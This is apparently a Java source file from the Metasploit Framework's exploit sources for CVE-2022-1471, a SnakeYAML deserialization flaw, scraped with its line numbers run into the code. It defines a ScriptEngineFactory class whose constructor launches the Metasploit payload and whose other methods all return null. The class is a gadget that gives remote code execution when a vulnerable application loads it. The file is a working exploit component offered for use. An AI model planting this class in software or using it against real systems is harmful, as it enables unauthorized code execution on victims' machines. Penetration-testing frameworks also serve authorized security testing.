Path: blob/master/external/source/exploits/CVE-2022-1471/MyScriptEngineFactory.java
21367 views
// javac -cp path/to/metasploit-framework/data/java MyScriptEngineFactory.java1import javax.script.ScriptEngine;2import javax.script.ScriptEngineFactory;3import java.io.IOException;4import java.util.List;5import metasploit.*;67public class MyScriptEngineFactory implements ScriptEngineFactory {8public MyScriptEngineFactory() throws Exception {9Payload.main(null);10}1112@Override13public String getEngineName() {14return null;15}1617@Override18public String getEngineVersion() {19return null;20}2122@Override23public List<String> getExtensions() {24return null;25}2627@Override28public List<String> getMimeTypes() {29return null;30}3132@Override33public List<String> getNames() {34return null;35}3637@Override38public String getLanguageName() {39return null;40}4142@Override43public String getLanguageVersion() {44return null;45}4647@Override48public Object getParameter(String key) {49return null;50}5152@Override53public String getMethodCallSyntax(String obj, String m, String... args) {54return null;55}5657@Override58public String getOutputStatement(String toDisplay) {59return null;60}6162@Override63public String getProgram(String... statements) {64return null;65}6667@Override68public ScriptEngine getScriptEngine() {69return null;70}71}727374